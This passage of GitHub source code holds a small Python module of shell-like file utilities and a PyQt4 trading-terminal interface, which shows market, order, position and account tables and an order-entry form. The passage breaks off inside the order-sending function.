"language": [
{
"name": "Python",
"bytes": "14101"
}
],
"symlink_target": ""
}
|
import os
import re
def mkdir(*args):
    """Create a directory, like the shell `mkdir` command.

    Best-effort: OS-level failures (directory already exists, missing
    parent, permissions) are swallowed and None is returned, matching the
    original behaviour. The bare `except:` was narrowed to OSError so
    KeyboardInterrupt/SystemExit and programming errors are no longer
    silently hidden.
    """
    try:
        return os.mkdir(*args)
    except OSError:
        return None
def ls(path='.'):
    """Return the directory listing of *path* (default: cwd), like `ls`."""
    entries = os.listdir(path)
    return entries
def cd(path):
    """Change the current working directory, like the shell `cd` builtin."""
    result = os.chdir(path)
    return result
def touch(path):
    """Create *path* if missing and update its timestamps, like `touch`.

    Reimplemented with the standard library instead of
    `os.system('touch ' + path)`, which failed on paths containing spaces
    or shell metacharacters and was a shell-injection hazard. Returns 0 on
    success to stay compatible with the old os.system() exit-status return.
    """
    # Open in append mode so existing contents are never truncated.
    with open(path, 'a'):
        os.utime(path, None)  # refresh atime/mtime like real touch
    return 0
def pwd():
    """Return the current working directory, like the shell `pwd`.

    Bug fix: the old implementation returned os.curdir, which is the
    literal string '.' — not the actual working directory.
    """
    return os.getcwd()
def cat():
    """Placeholder for `cat`; not implemented yet."""
    return None
def echo():
    """Placeholder for `echo`; not implemented yet."""
    return None
def head():
    """Placeholder for `head`; not implemented yet."""
    return None
def tail():
    """Placeholder for `tail`; not implemented yet."""
    return None
def grep():
    """Placeholder for `grep`; not implemented yet."""
    return None
|
{
"content_hash": "0dec699c8aac8249ee86b579437715fa",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 37,
"avg_line_length": 11.222222222222221,
"alnum_prop": 0.5767326732673267,
"repo_name": "geekan/psu",
"id": "9c9e10f777a9e7f71c9b80443f1cba9b16acc389",
"size": "404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psu/psu.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "781"
}
],
"symlink_target": ""
}
|
import json
import csv
from collections import OrderedDict
from PyQt4 import QtGui, QtCore
from eventEngine import *
from vtFunction import *
from vtGateway import *
#----------------------------------------------------------------------
def loadFont():
    """Load the UI font from VT_setting.json.

    Falls back to Microsoft YaHei 12pt when the file is missing, the JSON
    is malformed, or the expected keys are absent.
    """
    try:
        # Context manager replaces the old Py2 `file()` call, which leaked
        # the file handle (it was never closed).
        with open("VT_setting.json") as f:
            setting = json.load(f)
        family = setting['fontFamily']
        size = setting['fontSize']
        font = QtGui.QFont(family, size)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any settings problem falls back to the default.
        font = QtGui.QFont(u'微软雅黑', 12)
    return font

BASIC_FONT = loadFont()
########################################################################
class BasicCell(QtGui.QTableWidgetItem):
    """Basic table cell; renders the zero strings '0'/'0.0' as blank."""

    #----------------------------------------------------------------------
    def __init__(self, text=None, mainEngine=None):
        """Constructor"""
        super(BasicCell, self).__init__()
        self.data = None
        if text:
            self.setContent(text)

    #----------------------------------------------------------------------
    def setContent(self, text):
        """Display the text, blanking out zero values."""
        self.setText('' if text in ('0', '0.0') else text)
########################################################################
class DirectionCell(QtGui.QTableWidgetItem):
    """Table cell that colour-codes the trade direction."""

    #----------------------------------------------------------------------
    def __init__(self, text=None, mainEngine=None):
        """Constructor"""
        super(DirectionCell, self).__init__()
        self.data = None
        if text:
            self.setContent(text)

    #----------------------------------------------------------------------
    def setContent(self, text):
        """Paint long/net red and short green, then display the text."""
        if text in (DIRECTION_LONG, DIRECTION_NET):
            self.setForeground(QtGui.QColor('red'))
        elif text == DIRECTION_SHORT:
            self.setForeground(QtGui.QColor('green'))
        self.setText(text)
########################################################################
class NameCell(QtGui.QTableWidgetItem):
    """Table cell mapping a contract symbol to its display name."""

    #----------------------------------------------------------------------
    def __init__(self, text=None, mainEngine=None):
        """Constructor"""
        super(NameCell, self).__init__()
        self.mainEngine = mainEngine
        self.data = None
        if text:
            self.setContent(text)

    #----------------------------------------------------------------------
    def setContent(self, text):
        """Look up the contract for *text* and show its name if found."""
        if not self.mainEngine:
            return
        contract = self.mainEngine.getContract(text)
        # Only overwrite the cell when the contract info is available.
        if contract:
            self.setText(contract.name)
########################################################################
class BidCell(QtGui.QTableWidgetItem):
    """Bid-side cell: black text on a pink background."""

    #----------------------------------------------------------------------
    def __init__(self, text=None, mainEngine=None):
        """Constructor"""
        super(BidCell, self).__init__()
        self.data = None
        self.setForeground(QtGui.QColor('black'))
        self.setBackground(QtGui.QColor(255, 174, 201))
        if text:
            self.setContent(text)

    #----------------------------------------------------------------------
    def setContent(self, text):
        """Display the text as-is."""
        self.setText(text)
########################################################################
class AskCell(QtGui.QTableWidgetItem):
    """Ask-side cell: black text on a green background.

    (The original docstring said "bid price" — copy-paste slip.)
    """

    #----------------------------------------------------------------------
    def __init__(self, text=None, mainEngine=None):
        """Constructor"""
        super(AskCell, self).__init__()
        self.data = None
        self.setForeground(QtGui.QColor('black'))
        self.setBackground(QtGui.QColor(160, 255, 160))
        if text:
            self.setContent(text)

    #----------------------------------------------------------------------
    def setContent(self, text):
        """Display the text as-is."""
        self.setText(text)
########################################################################
class BasicMonitor(QtGui.QTableWidget):
    """
    Base monitor table.

    Values in headerDict are config dicts of the form:
    {'chinese': u'<display label>', 'cellType': BasicCell}
    """
    signal = QtCore.pyqtSignal(type(Event()))

    #----------------------------------------------------------------------
    def __init__(self, mainEngine=None, eventEngine=None, parent=None):
        """Constructor"""
        super(BasicMonitor, self).__init__(parent)
        self.mainEngine = mainEngine
        self.eventEngine = eventEngine
        # Header configuration.
        self.headerDict = OrderedDict()  # ordered: key = field name, value = config dict
        self.headerList = []  # mirrors self.headerDict.keys()
        # Row cache.
        self.dataDict = {}  # key = value of the key field, value = {header: cell}
        self.dataKey = ''  # attribute name used as the row key
        # Event type this table listens to.
        self.eventType = ''
        # Font applied to new cells (None = default).
        self.font = None
        # Whether to stash the data object on each cell (for e.g. cancel-by-click).
        self.saveData = False
        # Header sorting is off by default; widgets that need it can enable it.
        self.sorting = False
        # Build the right-click context menu.
        self.initMenu()

    #----------------------------------------------------------------------
    def setHeaderDict(self, headerDict):
        """Set the ordered header configuration dict."""
        self.headerDict = headerDict
        self.headerList = headerDict.keys()

    #----------------------------------------------------------------------
    def setDataKey(self, dataKey):
        """Set the attribute name used as the row key."""
        self.dataKey = dataKey

    #----------------------------------------------------------------------
    def setEventType(self, eventType):
        """Set the event type this monitor listens to."""
        self.eventType = eventType

    #----------------------------------------------------------------------
    def setFont(self, font):
        """Set the cell font."""
        self.font = font

    #----------------------------------------------------------------------
    def setSaveData(self, saveData):
        """Set whether the data object is stored on each cell."""
        self.saveData = saveData

    #----------------------------------------------------------------------
    def initTable(self):
        """Initialise the table from the header configuration."""
        # Column count follows the header config.
        col = len(self.headerDict)
        self.setColumnCount(col)
        # Column labels come from the 'chinese' display names.
        labels = [d['chinese'] for d in self.headerDict.values()]
        self.setHorizontalHeaderLabels(labels)
        # Hide the vertical (row-number) header.
        self.verticalHeader().setVisible(False)
        # Read-only table.
        self.setEditTriggers(self.NoEditTriggers)
        # Alternate row colours.
        self.setAlternatingRowColors(True)
        # Apply the sorting flag chosen by the subclass.
        self.setSortingEnabled(self.sorting)

    #----------------------------------------------------------------------
    def registerEvent(self):
        """Register the GUI-update event listener (via the Qt signal)."""
        self.signal.connect(self.updateEvent)
        self.eventEngine.register(self.eventType, self.signal.emit)

    #----------------------------------------------------------------------
    def updateEvent(self, event):
        """Handle an incoming event: unpack and update the table."""
        data = event.dict_['data']
        self.updateData(data)

    #----------------------------------------------------------------------
    def updateData(self, data):
        """Write the data object into the table."""
        # Sorting must be disabled while inserting, otherwise new rows
        # end up in the wrong place.
        if self.sorting:
            self.setSortingEnabled(False)
        # With a dataKey configured, rows are updated in place (keyed mode).
        if self.dataKey:
            key = data.__getattribute__(self.dataKey)
            # Unknown key: insert a new row at the top and create its cells.
            if key not in self.dataDict:
                self.insertRow(0)
                d = {}
                for n, header in enumerate(self.headerList):
                    content = safeUnicode(data.__getattribute__(header))
                    cellType = self.headerDict[header]['cellType']
                    cell = cellType(content, self.mainEngine)
                    if self.font:
                        cell.setFont(self.font)  # apply custom font if configured
                    if self.saveData:  # stash the data object when requested
                        cell.data = data
                    self.setItem(0, n, cell)
                    d[header] = cell
                self.dataDict[key] = d
            # Known key: update the existing row's cells.
            else:
                d = self.dataDict[key]
                for header in self.headerList:
                    content = safeUnicode(data.__getattribute__(header))
                    cell = d[header]
                    cell.setContent(content)
                    if self.saveData:  # keep the stored object current
                        cell.data = data
        # No dataKey: append-only mode, every event gets a fresh top row.
        else:
            self.insertRow(0)
            for n, header in enumerate(self.headerList):
                content = safeUnicode(data.__getattribute__(header))
                cellType = self.headerDict[header]['cellType']
                cell = cellType(content, self.mainEngine)
                if self.font:
                    cell.setFont(self.font)
                if self.saveData:
                    cell.data = data
                self.setItem(0, n, cell)
        # Fit columns to content.
        self.resizeColumns()
        # Re-enable sorting if it was on.
        if self.sorting:
            self.setSortingEnabled(True)

    #----------------------------------------------------------------------
    def resizeColumns(self):
        """Resize all columns to their contents."""
        self.horizontalHeader().resizeSections(QtGui.QHeaderView.ResizeToContents)

    #----------------------------------------------------------------------
    def setSorting(self, sorting):
        """Set whether sorting by header is allowed."""
        self.sorting = sorting

    #----------------------------------------------------------------------
    def saveToCsv(self):
        """Save the table contents to a CSV file (GBK-encoded)."""
        # Hide the context menu first.
        self.menu.close()
        # Ask the user for the target file name.
        path = QtGui.QFileDialog.getSaveFileName(self, '保存数据', '', 'CSV(*.csv)')
        try:
            # NOTE: path is a PyQt4 QString (api v1), hence isEmpty().
            if not path.isEmpty():
                with open(unicode(path), 'wb') as f:
                    writer = csv.writer(f)
                    # Header row.
                    headers = [header.encode('gbk') for header in self.headerList]
                    writer.writerow(headers)
                    # One CSV row per table row.
                    for row in range(self.rowCount()):
                        rowdata = []
                        for column in range(self.columnCount()):
                            item = self.item(row, column)
                            if item is not None:
                                rowdata.append(
                                    unicode(item.text()).encode('gbk'))
                            else:
                                rowdata.append('')
                        writer.writerow(rowdata)
        except IOError:
            pass

    #----------------------------------------------------------------------
    def initMenu(self):
        """Build the right-click context menu."""
        self.menu = QtGui.QMenu(self)
        saveAction = QtGui.QAction(u'保存内容', self)
        saveAction.triggered.connect(self.saveToCsv)
        self.menu.addAction(saveAction)

    #----------------------------------------------------------------------
    def contextMenuEvent(self, event):
        """Show the context menu on right click."""
        self.menu.popup(QtGui.QCursor.pos())
########################################################################
class MarketMonitor(BasicMonitor):
    """Market data (tick) monitor."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(MarketMonitor, self).__init__(mainEngine, eventEngine, parent)
        # Column layout: (field name, display label, cell class).
        columns = [
            ('symbol', u'合约代码', BasicCell),
            ('vtSymbol', u'名称', NameCell),
            ('lastPrice', u'最新价', BasicCell),
            ('preClosePrice', u'昨收盘价', BasicCell),
            ('volume', u'成交量', BasicCell),
            ('openInterest', u'持仓量', BasicCell),
            ('openPrice', u'开盘价', BasicCell),
            ('highPrice', u'最高价', BasicCell),
            ('lowPrice', u'最低价', BasicCell),
            ('bidPrice1', u'买一价', BidCell),
            ('bidVolume1', u'买一量', BidCell),
            ('askPrice1', u'卖一价', AskCell),
            ('askVolume1', u'卖一量', AskCell),
            ('time', u'时间', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        # One row per contract, keyed by vtSymbol, fed by tick events.
        self.setDataKey('vtSymbol')
        self.setEventType(EVENT_TICK)
        self.setFont(BASIC_FONT)
        self.setSorting(True)
        self.initTable()
        self.registerEvent()
########################################################################
class LogMonitor(BasicMonitor):
    """Log message monitor (append-only)."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(LogMonitor, self).__init__(mainEngine, eventEngine, parent)
        columns = [
            ('logTime', u'时间', BasicCell),
            ('logContent', u'内容', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        self.setEventType(EVENT_LOG)
        self.setFont(BASIC_FONT)
        self.initTable()
        self.registerEvent()
########################################################################
class ErrorMonitor(BasicMonitor):
    """Error message monitor (append-only)."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(ErrorMonitor, self).__init__(mainEngine, eventEngine, parent)
        columns = [
            ('errorTime', u'错误时间', BasicCell),
            ('errorID', u'错误代码', BasicCell),
            ('errorMsg', u'错误信息', BasicCell),
            ('additionalInfo', u'补充信息', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        self.setEventType(EVENT_ERROR)
        self.setFont(BASIC_FONT)
        self.initTable()
        self.registerEvent()
########################################################################
class TradeMonitor(BasicMonitor):
    """Trade (fill) monitor (append-only)."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(TradeMonitor, self).__init__(mainEngine, eventEngine, parent)
        columns = [
            ('tradeID', u'成交编号', BasicCell),
            ('orderID', u'委托编号', BasicCell),
            ('symbol', u'合约代码', BasicCell),
            ('vtSymbol', u'名称', NameCell),
            ('direction', u'方向', DirectionCell),
            ('offset', u'开平', BasicCell),
            ('price', u'价格', BasicCell),
            ('volume', u'数量', BasicCell),
            ('tradeTime', u'成交时间', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        self.setEventType(EVENT_TRADE)
        self.setFont(BASIC_FONT)
        self.initTable()
        self.registerEvent()
########################################################################
class OrderMonitor(BasicMonitor):
    """Order monitor with double-click cancellation."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(OrderMonitor, self).__init__(mainEngine, eventEngine, parent)
        self.mainEngine = mainEngine
        columns = [
            ('orderID', u'委托编号', BasicCell),
            ('symbol', u'合约代码', BasicCell),
            ('vtSymbol', u'名称', NameCell),
            ('direction', u'方向', DirectionCell),
            ('offset', u'开平', BasicCell),
            ('price', u'价格', BasicCell),
            ('totalVolume', u'委托数量', BasicCell),
            ('tradedVolume', u'成交数量', BasicCell),
            ('status', u'状态', BasicCell),
            ('orderTime', u'委托时间', BasicCell),
            ('cancelTime', u'撤销时间', BasicCell),
            ('frontID', u'前置编号', BasicCell),
            ('sessionID', u'会话编号', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        # One row per order, keyed by vtOrderID; data objects are stored
        # on the cells so cancelOrder can recover the order on click.
        self.setDataKey('vtOrderID')
        self.setEventType(EVENT_ORDER)
        self.setFont(BASIC_FONT)
        self.setSaveData(True)
        self.initTable()
        self.registerEvent()
        self.connectSignal()

    #----------------------------------------------------------------------
    def connectSignal(self):
        """Hook double-click on a cell to order cancellation."""
        self.itemDoubleClicked.connect(self.cancelOrder)

    #----------------------------------------------------------------------
    def cancelOrder(self, cell):
        """Cancel the order stored on the clicked cell."""
        order = cell.data
        req = VtCancelOrderReq()
        # Copy the identifying fields from the order onto the request.
        for attr in ('symbol', 'exchange', 'frontID', 'sessionID', 'orderID'):
            setattr(req, attr, getattr(order, attr))
        self.mainEngine.cancelOrder(req, order.gatewayName)
########################################################################
class PositionMonitor(BasicMonitor):
    """Position monitor, one row per position name."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(PositionMonitor, self).__init__(mainEngine, eventEngine, parent)
        columns = [
            ('symbol', u'合约代码', BasicCell),
            ('vtSymbol', u'名称', NameCell),
            ('direction', u'方向', DirectionCell),
            ('position', u'持仓量', BasicCell),
            ('ydPosition', u'昨持仓', BasicCell),
            ('frozen', u'冻结量', BasicCell),
            ('price', u'价格', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        self.setDataKey('vtPositionName')
        self.setEventType(EVENT_POSITION)
        self.setFont(BASIC_FONT)
        self.setSaveData(True)
        self.initTable()
        self.registerEvent()
########################################################################
class AccountMonitor(BasicMonitor):
    """Account monitor, one row per account id."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, eventEngine, parent=None):
        """Constructor"""
        super(AccountMonitor, self).__init__(mainEngine, eventEngine, parent)
        columns = [
            ('accountID', u'账户', BasicCell),
            ('preBalance', u'昨结', BasicCell),
            ('balance', u'净值', BasicCell),
            ('available', u'可用', BasicCell),
            ('commission', u'手续费', BasicCell),
            ('margin', u'保证金', BasicCell),
            ('closeProfit', u'平仓盈亏', BasicCell),
            ('positionProfit', u'持仓盈亏', BasicCell),
            ('gatewayName', u'接口', BasicCell),
        ]
        d = OrderedDict(
            (field, {'chinese': label, 'cellType': cellClass})
            for field, label, cellClass in columns)
        self.setHeaderDict(d)
        self.setDataKey('vtAccountID')
        self.setEventType(EVENT_ACCOUNT)
        self.setFont(BASIC_FONT)
        self.initTable()
        self.registerEvent()
########################################################################
class TradingWidget(QtGui.QFrame):
"""简单交易组件"""
signal = QtCore.pyqtSignal(type(Event()))
directionList = [DIRECTION_LONG,
DIRECTION_SHORT]
offsetList = [OFFSET_OPEN,
OFFSET_CLOSE,
OFFSET_CLOSEYESTERDAY,
OFFSET_CLOSETODAY]
priceTypeList = [PRICETYPE_LIMITPRICE,
PRICETYPE_MARKETPRICE,
PRICETYPE_FAK,
PRICETYPE_FOK]
exchangeList = [EXCHANGE_NONE,
EXCHANGE_CFFEX,
EXCHANGE_SHFE,
EXCHANGE_DCE,
EXCHANGE_CZCE,
EXCHANGE_SSE,
EXCHANGE_SZSE,
EXCHANGE_SGE,
EXCHANGE_HKEX,
EXCHANGE_SMART,
EXCHANGE_NYMEX,
EXCHANGE_GLOBEX,
EXCHANGE_IDEALPRO]
currencyList = [CURRENCY_NONE,
CURRENCY_CNY,
CURRENCY_USD]
productClassList = [PRODUCT_NONE,
PRODUCT_EQUITY,
PRODUCT_FUTURES,
PRODUCT_OPTION,
PRODUCT_FOREX]
gatewayList = ['']
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine, parent=None):
"""Constructor"""
super(TradingWidget, self).__init__(parent)
self.mainEngine = mainEngine
self.eventEngine = eventEngine
self.symbol = ''
# 添加交易接口
self.gatewayList.extend(mainEngine.gatewayDict.keys())
self.initUi()
self.connectSignal()
#----------------------------------------------------------------------
def initUi(self):
"""初始化界面"""
self.setWindowTitle(u'交易')
self.setMaximumWidth(400)
self.setFrameShape(self.Box) # 设置边框
self.setLineWidth(1)
# 左边部分
labelSymbol = QtGui.QLabel(u'代码')
labelName = QtGui.QLabel(u'名称')
labelDirection = QtGui.QLabel(u'方向类型')
labelOffset = QtGui.QLabel(u'开平')
labelPrice = QtGui.QLabel(u'价格')
self.checkFixed = QtGui.QCheckBox(u'固定') # 价格固定选择框
labelVolume = QtGui.QLabel(u'数量')
# self.checkVolumeFixed = QtGui.QCheckBox(u'锁定') # 锁定Volume为0
labelPriceType = QtGui.QLabel(u'价格类型')
labelExchange = QtGui.QLabel(u'交易所')
labelCurrency = QtGui.QLabel(u'货币')
labelProductClass = QtGui.QLabel(u'产品类型')
labelGateway = QtGui.QLabel(u'交易接口')
self.lineSymbol = QtGui.QLineEdit()
self.lineName = QtGui.QLineEdit()
self.comboDirection = QtGui.QComboBox()
self.comboDirection.addItems(self.directionList)
self.comboOffset = QtGui.QComboBox()
self.comboOffset.addItems(self.offsetList)
self.spinPrice = QtGui.QDoubleSpinBox()
self.spinPrice.setDecimals(4)
self.spinPrice.setMinimum(0)
self.spinPrice.setMaximum(100000)
self.spinVolume = QtGui.QSpinBox()
self.spinVolume.setMinimum(0)
self.spinVolume.setMaximum(1000000)
self.comboPriceType = QtGui.QComboBox()
self.comboPriceType.addItems(self.priceTypeList)
self.comboExchange = QtGui.QComboBox()
self.comboExchange.addItems(self.exchangeList)
self.comboCurrency = QtGui.QComboBox()
self.comboCurrency.addItems(self.currencyList)
self.comboProductClass = QtGui.QComboBox()
self.comboProductClass.addItems(self.productClassList)
self.comboGateway = QtGui.QComboBox()
self.comboGateway.addItems(self.gatewayList)
gridleft = QtGui.QGridLayout()
gridleft.addWidget(labelSymbol, 0, 0)
gridleft.addWidget(labelName, 1, 0)
gridleft.addWidget(labelDirection, 2, 0)
gridleft.addWidget(labelOffset, 3, 0)
gridleft.addWidget(labelPrice, 4, 0)
gridleft.addWidget(labelVolume, 5, 0)
gridleft.addWidget(labelPriceType, 6, 0)
gridleft.addWidget(labelExchange, 7, 0)
gridleft.addWidget(labelCurrency, 8, 0)
gridleft.addWidget(labelProductClass, 9, 0)
gridleft.addWidget(labelGateway, 10, 0)
gridleft.addWidget(self.lineSymbol, 0, 1, 1, -1)
gridleft.addWidget(self.lineName, 1, 1, 1, -1)
gridleft.addWidget(self.comboDirection, 2, 1, 1, -1)
gridleft.addWidget(self.comboOffset, 3, 1, 1, -1)
gridleft.addWidget(self.spinPrice, 4, 1)
gridleft.addWidget(self.checkFixed, 4, 2)
gridleft.addWidget(self.spinVolume, 5, 1, 1, -1)
# gridleft.addWidget(self.checkVolumeFixed, 5, 2)
gridleft.addWidget(self.comboPriceType, 6, 1, 1, -1)
gridleft.addWidget(self.comboExchange, 7, 1, 1, -1)
gridleft.addWidget(self.comboCurrency, 8, 1, 1, -1)
gridleft.addWidget(self.comboProductClass, 9, 1, 1, -1)
gridleft.addWidget(self.comboGateway, 10, 1, 1, -1)
# 右边部分
labelBid1 = QtGui.QLabel(u'买一')
labelBid2 = QtGui.QLabel(u'买二')
labelBid3 = QtGui.QLabel(u'买三')
labelBid4 = QtGui.QLabel(u'买四')
labelBid5 = QtGui.QLabel(u'买五')
labelAsk1 = QtGui.QLabel(u'卖一')
labelAsk2 = QtGui.QLabel(u'卖二')
labelAsk3 = QtGui.QLabel(u'卖三')
labelAsk4 = QtGui.QLabel(u'卖四')
labelAsk5 = QtGui.QLabel(u'卖五')
self.labelBidPrice1 = QtGui.QLabel()
self.labelBidPrice2 = QtGui.QLabel()
self.labelBidPrice3 = QtGui.QLabel()
self.labelBidPrice4 = QtGui.QLabel()
self.labelBidPrice5 = QtGui.QLabel()
self.labelBidVolume1 = QtGui.QLabel()
self.labelBidVolume2 = QtGui.QLabel()
self.labelBidVolume3 = QtGui.QLabel()
self.labelBidVolume4 = QtGui.QLabel()
self.labelBidVolume5 = QtGui.QLabel()
self.labelAskPrice1 = QtGui.QLabel()
self.labelAskPrice2 = QtGui.QLabel()
self.labelAskPrice3 = QtGui.QLabel()
self.labelAskPrice4 = QtGui.QLabel()
self.labelAskPrice5 = QtGui.QLabel()
self.labelAskVolume1 = QtGui.QLabel()
self.labelAskVolume2 = QtGui.QLabel()
self.labelAskVolume3 = QtGui.QLabel()
self.labelAskVolume4 = QtGui.QLabel()
self.labelAskVolume5 = QtGui.QLabel()
labelLast = QtGui.QLabel(u'最新')
self.labelLastPrice = QtGui.QLabel()
self.labelReturn = QtGui.QLabel()
self.labelLastPrice.setMinimumWidth(60)
self.labelReturn.setMinimumWidth(60)
gridRight = QtGui.QGridLayout()
gridRight.addWidget(labelAsk5, 0, 0)
gridRight.addWidget(labelAsk4, 1, 0)
gridRight.addWidget(labelAsk3, 2, 0)
gridRight.addWidget(labelAsk2, 3, 0)
gridRight.addWidget(labelAsk1, 4, 0)
gridRight.addWidget(labelLast, 5, 0)
gridRight.addWidget(labelBid1, 6, 0)
gridRight.addWidget(labelBid2, 7, 0)
gridRight.addWidget(labelBid3, 8, 0)
gridRight.addWidget(labelBid4, 9, 0)
gridRight.addWidget(labelBid5, 10, 0)
gridRight.addWidget(self.labelAskPrice5, 0, 1)
gridRight.addWidget(self.labelAskPrice4, 1, 1)
gridRight.addWidget(self.labelAskPrice3, 2, 1)
gridRight.addWidget(self.labelAskPrice2, 3, 1)
gridRight.addWidget(self.labelAskPrice1, 4, 1)
gridRight.addWidget(self.labelLastPrice, 5, 1)
gridRight.addWidget(self.labelBidPrice1, 6, 1)
gridRight.addWidget(self.labelBidPrice2, 7, 1)
gridRight.addWidget(self.labelBidPrice3, 8, 1)
gridRight.addWidget(self.labelBidPrice4, 9, 1)
gridRight.addWidget(self.labelBidPrice5, 10, 1)
gridRight.addWidget(self.labelAskVolume5, 0, 2)
gridRight.addWidget(self.labelAskVolume4, 1, 2)
gridRight.addWidget(self.labelAskVolume3, 2, 2)
gridRight.addWidget(self.labelAskVolume2, 3, 2)
gridRight.addWidget(self.labelAskVolume1, 4, 2)
gridRight.addWidget(self.labelReturn, 5, 2)
gridRight.addWidget(self.labelBidVolume1, 6, 2)
gridRight.addWidget(self.labelBidVolume2, 7, 2)
gridRight.addWidget(self.labelBidVolume3, 8, 2)
gridRight.addWidget(self.labelBidVolume4, 9, 2)
gridRight.addWidget(self.labelBidVolume5, 10, 2)
# 发单按钮
buttonSendOrder = QtGui.QPushButton(u'发单')
buttonCancelAll = QtGui.QPushButton(u'全撤')
size = buttonSendOrder.sizeHint()
buttonSendOrder.setMinimumHeight(size.height()*2) # 把按钮高度设为默认两倍
buttonCancelAll.setMinimumHeight(size.height()*2)
# 整合布局
hbox = QtGui.QHBoxLayout()
hbox.addLayout(gridleft)
hbox.addLayout(gridRight)
vbox = QtGui.QVBoxLayout()
vbox.addLayout(hbox)
vbox.addWidget(buttonSendOrder)
vbox.addWidget(buttonCancelAll)
vbox.addStretch()
self.setLayout(vbox)
# 关联更新
buttonSendOrder.clicked.connect(self.sendOrder)
buttonCancelAll.clicked.connect(self.cancelAll)
self.lineSymbol.returnPressed.connect(self.updateSymbol)
#----------------------------------------------------------------------
def updateSymbol(self):
"""合约变化"""
# 读取组件数据
symbol = str(self.lineSymbol.text())
exchange = unicode(self.comboExchange.currentText())
currency = unicode(self.comboCurrency.currentText())
productClass = unicode(self.comboProductClass.currentText())
gatewayName = unicode(self.comboGateway.currentText())
# 查询合约
if exchange:
vtSymbol = '.'.join([symbol, exchange])
contract = self.mainEngine.getContract(vtSymbol)
else:
vtSymbol = symbol
contract = self.mainEngine.getContract(symbol)
if contract:
vtSymbol = contract.vtSymbol
gatewayName = contract.gatewayName
self.lineName.setText(contract.name)
exchange = contract.exchange # 保证有交易所代码
# 清空价格数量
self.spinPrice.setValue(0)
self.spinVolume.setValue(0)
# 清空行情显示
self.labelBidPrice1.setText('')
self.labelBidPrice2.setText('')
self.labelBidPrice3.setText('')
self.labelBidPrice4.setText('')
self.labelBidPrice5.setText('')
self.labelBidVolume1.setText('')
self.labelBidVolume2.setText('')
self.labelBidVolume3.setText('')
self.labelBidVolume4.setText('')
self.labelBidVolume5.setText('')
self.labelAskPrice1.setText('')
self.labelAskPrice2.setText('')
self.labelAskPrice3.setText('')
self.labelAskPrice4.setText('')
self.labelAskPrice5.setText('')
self.labelAskVolume1.setText('')
self.labelAskVolume2.setText('')
self.labelAskVolume3.setText('')
self.labelAskVolume4.setText('')
self.labelAskVolume5.setText('')
self.labelLastPrice.setText('')
self.labelReturn.setText('')
# 重新注册事件监听
self.eventEngine.unregister(EVENT_TICK + self.symbol, self.signal.emit)
self.eventEngine.register(EVENT_TICK + vtSymbol, self.signal.emit)
# 订阅合约
req = VtSubscribeReq()
req.symbol = symbol
req.exchange = exchange
req.currency = currency
req.productClass = productClass
# 默认跟随价
self.checkFixed.setChecked(False)
self.mainEngine.subscribe(req, gatewayName)
# 更新组件当前交易的合约
self.symbol = vtSymbol
#----------------------------------------------------------------------
def updateTick(self, event):
"""更新行情"""
tick = event.dict_['data']
if tick.vtSymbol == self.symbol:
if not self.checkFixed.isChecked():
self.spinPrice.setValue(tick.lastPrice)
self.labelBidPrice1.setText(str(tick.bidPrice1))
self.labelAskPrice1.setText(str(tick.askPrice1))
self.labelBidVolume1.setText(str(tick.bidVolume1))
self.labelAskVolume1.setText(str(tick.askVolume1))
if tick.bidPrice2:
self.labelBidPrice2.setText(str(tick.bidPrice2))
self.labelBidPrice3.setText(str(tick.bidPrice3))
self.labelBidPrice4.setText(str(tick.bidPrice4))
self.labelBidPrice5.setText(str(tick.bidPrice5))
self.labelAskPrice2.setText(str(tick.askPrice2))
self.labelAskPrice3.setText(str(tick.askPrice3))
self.labelAskPrice4.setText(str(tick.askPrice4))
self.labelAskPrice5.setText(str(tick.askPrice5))
self.labelBidVolume2.setText(str(tick.bidVolume2))
self.labelBidVolume3.setText(str(tick.bidVolume3))
self.labelBidVolume4.setText(str(tick.bidVolume4))
self.labelBidVolume5.setText(str(tick.bidVolume5))
self.labelAskVolume2.setText(str(tick.askVolume2))
self.labelAskVolume3.setText(str(tick.askVolume3))
self.labelAskVolume4.setText(str(tick.askVolume4))
self.labelAskVolume5.setText(str(tick.askVolume5))
self.labelLastPrice.setText(str(tick.lastPrice))
if tick.preClosePrice:
rt = (tick.lastPrice/tick.preClosePrice)-1
self.labelReturn.setText(('%.2f' %(rt*100))+'%')
else:
self.labelReturn.setText('')
#----------------------------------------------------------------------
def connectSignal(self):
"""连接Signal"""
self.signal.connect(self.updateTick)
#----------------------------------------------------------------------
def sendOrder(self):
"""发单"""
symbol = str(self.lineSymbol.text())
